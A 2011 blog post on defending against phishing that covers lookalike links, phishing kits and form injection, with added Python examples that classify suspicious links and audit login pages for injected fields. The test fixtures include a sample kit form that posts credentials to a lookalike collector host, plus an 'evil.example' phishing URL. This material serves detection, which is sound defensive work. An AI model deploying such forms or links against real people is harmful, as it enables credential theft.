
BLOG: Guarding against phishing

Derek Manky | June 3, 2011
Google has recommended that Gmail users adopt a two-step verification process, which requires them to enter a code sent to their phone after they have entered their password. Here are some more tips for combating phishing threats.

Avoiding the hook

Always pay attention to links ("think before you link") before you click. Hover your mouse over a link to see where it is really taking you before you click it, and look carefully at the domain in the link: "validbank.com" is not the same as "validbank.com.accounts.com", where the domain actually being visited is accounts.com. Never give out a credit card number in response to an unsolicited request. Always make sure SSL (HTTPS) is in use before completing any transaction online (look for the lock icon in your browser), and if the browser reports that the certificate is not valid, hold off until you have verified the site with security experts. Finally, search to see whether others have reported suspicious activity involving the subject line or content of the message. Fortinet's FortiGuard blog is a good place to start.
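The domain check above is easy to get wrong by eye, because the trusted name can appear anywhere inside a hostname that belongs to someone else. The following is an added example (not code from the article or from Fortinet) of the check a link scanner or mail filter would make: it pulls the registrable domain out of a URL, compares it with the domain the user expects, and also flags links whose visible text names a different domain than the href. The sample links, the small suffix table and the helper names are constructed for illustration.

```python
"""Classify links the way the "hover before you click" advice suggests.

Added example; helper names, the suffix table and the sample links are
assumptions constructed for illustration, not part of the original article.
"""
from urllib.parse import urlparse

# A real tool would consult the Public Suffix List; this short table is an
# assumption that is enough to show the idea (e.g. "validbank.co.uk").
TWO_LABEL_SUFFIXES = {"co.uk", "com.au", "com.sg"}

# Constructed sample links, including the article's validbank example.
SAMPLE_LINKS = [
    "https://www.validbank.com/login",
    "http://validbank.com/login",
    "https://validbank.com.accounts.com/login",
    "https://validbank.com@evil.example/login",
    "https://203.0.113.5/login",
]


def registrable_domain(hostname: str) -> str:
    """Return the part of the host that a registrant actually controls,
    e.g. 'accounts.com' for 'validbank.com.accounts.com'."""
    labels = hostname.lower().rstrip(".").split(".")
    if len(labels) >= 3 and ".".join(labels[-2:]) in TWO_LABEL_SUFFIXES:
        return ".".join(labels[-3:])
    return ".".join(labels[-2:])


def check_link(url: str, expected_domain: str) -> dict:
    """Compare a link against the domain the user expects.

    Verdicts: 'ok' (expected domain over HTTPS), 'not-https' (right domain,
    no SSL), 'lookalike' (the trusted name appears inside a foreign host),
    'ip-address' (a bare IP instead of a name) or 'foreign'.
    """
    parsed = urlparse(url)
    # .hostname drops any user@ prefix, so "validbank.com@evil.example"
    # is correctly seen as evil.example.
    host = parsed.hostname or ""
    expected = expected_domain.lower()
    if host.replace(".", "").isdigit():
        verdict = "ip-address"
    elif registrable_domain(host) == expected:
        verdict = "ok" if parsed.scheme == "https" else "not-https"
    elif expected.split(".")[0] in host:
        verdict = "lookalike"
    else:
        verdict = "foreign"
    return {"host": host, "domain": registrable_domain(host), "verdict": verdict}


def anchor_mismatch(display_text: str, href: str) -> bool:
    """True when the visible link text names one domain but the href another."""
    shown = display_text.strip()
    if "." not in shown:
        return False  # plain words like "Sign in" make no domain claim
    if "://" not in shown:
        shown = "https://" + shown
    shown_host = urlparse(shown).hostname or ""
    real_host = urlparse(href).hostname or ""
    if not shown_host or not real_host:
        return False
    return registrable_domain(shown_host) != registrable_domain(real_host)


if __name__ == "__main__":
    for link in SAMPLE_LINKS:
        result = check_link(link, "validbank.com")
        print(f"{result['verdict']:<11} {link}  (domain: {result['domain']})")
    print("text/href mismatch:",
          anchor_mismatch("www.validbank.com/login",
                          "https://validbank.com.accounts.com/login"))
```

The registrable-domain step is the part that matters: once the host is reduced to the name a registrant controls, "validbank.com.accounts.com" collapses to accounts.com and no amount of brand-name padding on the left can disguise it.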

Phishing kits

Attackers may obtain kits to deploy on Web servers that make their phish seem legitimate. These kits often contain pre-built templates for popular banks and social networking sites. After a victim is hooked, they are brought to a Website the attacker controls and shown the matching template (i.e. HTML code and graphics that mirror www.validbank.com's setup). When the victim enters their credentials, they are sent to the phisher's Website and collected by the phishing kit.

Like most crimeware (software tools used for criminal purposes), hundreds of phishing kits exist today. One of the most popular is the Rock Phish kit. There are advanced phishing components in botnets such as Zeus and SpyEye. These use a technique known as form injection. In this case, the user's machine is already compromised (even if they log in to validbank's real site, their credentials will be sent to the attacker regardless).

In addition, the attacker extracts further information by injecting fields into the banking session while the victim is logging in. For example, the injected form may ask for a driver's licence number or mother's maiden name. These details are then leveraged down the road, typically for identity fraud.

Detecting kits

Common phishing kits can be detected with anti-virus and Web filtering applications. Generic anti-virus detection can identify a kit no matter which Web server it is deployed on, while Web filtering can block known phishing Web servers even when the attackers change the code or templates to avoid detection. Kits can redirect you to the original site after harvesting your information, so it is not safe to assume that because you logged in successfully, nothing malicious has occurred.
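Both of the kit behaviours described above leave a trace in the login page itself: a kit template posts the credentials to the attacker's host rather than the bank's, and form injection adds inputs that the genuine page never had. The following added example (not code from the article or from Fortinet) shows the baseline check a bank's page-integrity monitor or a browser-side guard could run: it parses every form on a page, compares the field names against the expected set, and flags any form whose action leaves the bank's domain. The three HTML pages and the expected-field baseline are constructed for illustration.

```python
"""Audit a login page for injected fields and off-site form actions.

Added example; the HTML samples and the expected-field baseline are
assumptions constructed for illustration, not taken from the original article.
"""
from html.parser import HTMLParser
from urllib.parse import urlparse

# Constructed baseline: what the genuine validbank login form asks for.
EXPECTED_FIELDS = {"username", "password"}

# Constructed sample pages.
CLEAN_PAGE = """
<form action="/login" method="post">
  <input type="hidden" name="csrf" value="token123">
  <input name="username"><input type="password" name="password">
  <input type="submit" value="Sign in">
</form>
"""

# Form injection: the genuine form with two extra questions added in-session.
INJECTED_PAGE = """
<form action="/login" method="post">
  <input name="username"><input type="password" name="password">
  <input name="drivers_licence"><input name="mothers_maiden_name">
  <input type="submit" value="Sign in">
</form>
"""

# Kit template: looks like the bank's form but posts to the lookalike host.
KIT_PAGE = """
<form action="https://validbank.com.accounts.com/collect" method="post">
  <input name="username"><input type="password" name="password">
</form>
"""


class FormCollector(HTMLParser):
    """Collect every <form> with its action and the names of its user-facing inputs."""

    def __init__(self):
        super().__init__()
        self.forms = []
        self._current = None

    def handle_starttag(self, tag, attrs):
        attrs = dict(attrs)
        if tag == "form":
            self._current = {"action": attrs.get("action") or "", "fields": []}
            self.forms.append(self._current)
        elif tag in ("input", "select", "textarea") and self._current is not None:
            name = attrs.get("name")
            kind = (attrs.get("type") or "text").lower()
            # Hidden inputs (CSRF tokens etc.) vary per session, so they are
            # left out of the baseline comparison; only fields a person is
            # asked to fill in are compared.
            if name and kind not in ("submit", "hidden"):
                self._current["fields"].append(name)

    def handle_endtag(self, tag):
        if tag == "form":
            self._current = None


def audit_login_page(html: str, expected_host: str, expected_fields: set) -> list:
    """Return one finding per form: where it posts, and how its fields differ
    from the expected baseline."""
    parser = FormCollector()
    parser.feed(html)
    findings = []
    for form in parser.forms:
        # A relative action (e.g. "/login") stays on the current site.
        action_host = urlparse(form["action"]).hostname or expected_host
        on_site = action_host == expected_host or action_host.endswith("." + expected_host)
        observed = set(form["fields"])
        findings.append({
            "action_host": action_host,
            "posts_offsite": not on_site,
            "injected_fields": sorted(observed - expected_fields),
            "missing_fields": sorted(expected_fields - observed),
        })
    return findings


if __name__ == "__main__":
    for label, page in (("clean", CLEAN_PAGE), ("injected", INJECTED_PAGE), ("kit", KIT_PAGE)):
        for finding in audit_login_page(page, "validbank.com", EXPECTED_FIELDS):
            print(f"{label:<9} {finding}")
```

The off-site test uses a plain suffix match on the bank's own hostname rather than a public-suffix lookup, which is enough here because the bank knows exactly which host its form should post to; "validbank.com.accounts.com" fails that test because it does not end in ".validbank.com". The field comparison is what catches form injection on an already-compromised machine, where the address bar and certificate both look right.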

The Four Types of Phishing Scams

Phishing Blind
Spear-Phishing
Whaling
Vishing

Blind phishing is simply the act of casting the bait out into cyberspace, usually through mass spam e-mails, hoping someone will bite. These attacks usually go after common targets such as banking and social network credentials.
